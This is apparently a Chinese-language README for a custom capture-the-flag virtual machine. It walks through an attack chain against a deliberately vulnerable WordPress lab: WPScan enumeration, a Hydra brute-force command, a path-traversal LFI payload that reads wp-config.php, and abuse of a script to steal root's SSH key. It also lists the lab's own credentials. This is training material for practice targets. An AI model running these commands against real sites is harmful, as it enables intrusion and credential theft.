```
██████ ████████ ███████ ██████ ██ ██ ██████ ██ ██ ███ ██ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██
██ ███ ██ ██ ██ ██ ██ ██ ██ ███ ████ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ▄▄ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██ ██ ██████ ██████ ██████ ██ ██ ████ ██████
▀▀
```
// 红队 CTF // EXPLOIT CHAIN // LFI → ROOT //
自定义夺旗赛(CTF)机器 — WordPress LFI 漏洞利用至 root 提权
## ☠️ 任务概述
由 **aBadRoy** 专为红队训练设计的 CTF 靶机。本挑战模拟了真实的 WordPress 漏洞利用链:易受攻击的插件 → LFI → 凭据窃取 → 提权 → root 访问权限。
| 字段 | 情报 |
|-------|-------|
| **操作者** | aBadRoy |
| **挑战类型** | Web 漏洞利用 → 提权 |
| **攻击向量** | WordPress 插件 LFI |
| **提权** | 自定义 Python 脚本利用 → SSH 密钥窃取 |
| **Flag** | `/root/flag.txt` |
## ⚔️ Kill Chain
```
RECONNAISSANCE
│
▼
WORDPRESS ENUMERATION (WPScan)
├── User Discovery → "jeremy"
├── Plugin Enum → "Report Reader"
└── Weak credentials identified
│
▼
INITIAL ACCESS
├── Hydra brute force → wp-admin
└── LFI via Report Reader plugin
│
▼
CREDENTIAL THEFT
├── LFI → wp-config.php
└── Database credentials extracted
│
▼
PRIVILEGE ESCALATION
├── publish.py analysis
├── File manipulation → SSH key extraction
└── Root shell via private key
│
▼
FLAG ───> /root/flag.txt
```
## 🔴 部署
```
# 在 VirtualBox 或 VMware 中导入 OVF
# VM: Ubuntu_server_20.ovf + Ubuntu_server_20.mf
# Network: NAT + Host-Only
# Target: http://
/wordpress
# 重置凭据:
# wp-admin: jeremy / Partyman1!
# SSH: 仅通过私钥进行 root 访问
```
## 🎯 实战演练
### 阶段 1:侦察
```
nmap -sC -sV -p- -oA recon
wpscan --url http:///wordpress --enumerate u,vp
```
### 阶段 2:初始访问
```
# 爆破 WordPress 管理员
hydra -l jeremy -P rockyou.txt \
http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid"
# LFI payload
POST /wordpress/wp-content/plugins/report-reader/read.php
Parameter: file=../../../wp-config.php
```
### 阶段 3:凭据提取
```
# 从 wp-config.php:
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'WpP@ss!2024');
# MySQL 访问
mysql -u wordpress -p -h localhost
> SELECT user_pass FROM wp_users;
```
### 阶段 4:提权
```
# 分析 publish.py
cat /opt/scripts/publish.py
# 利用文件移动权限
python3 /opt/scripts/publish.py --move /root/.ssh/id_rsa /tmp/key
# Root shell
ssh -i /tmp/key root@localhost
# Capture flag
cat /root/flag.txt
🏁 FLAG{RED_TEAM_ROOT_ACCESS_GRANTED}
```
## 📊 难度矩阵
| 阶段 | 难度 | 技术 |
|-------|------------|-----------|
| 侦察 | 🟡 中等 | WPScan, Nmap |
| WordPress 访问 | 🟡 中等 | Hydra 暴力破解 |
| LFI 漏洞利用 | 🔴 困难 | 插件漏洞 |
| 提权 | 🔴 困难 | 自定义脚本滥用 |
| 总体 | 🔴 困难 | 真实攻击链 |
## ☠️ 操作者笔记
## 🔴 命令与控制
```
root@aBadRoy:~# cat /etc/red-team/motd
╔═══════════════════════════════════════════════════════╗
║ ║
║ "Access is the only law. ║
║ Everything else is just a firewall ║
║ waiting to be breached." ║
║ ║
║ 🔴 OPERATOR: aBadRoy ║
║ 🔴 MISSION: CTF — ROOT ACCESS GRANTED ║
║ 🔴 STATUS: RED TEAM ACTIVE ║
║ ║
╚═══════════════════════════════════════════════════════╝
root@aBadRoy:~# █
```
🔴 红队操作者 | aBadRoy | 进攻性安全部门 🔴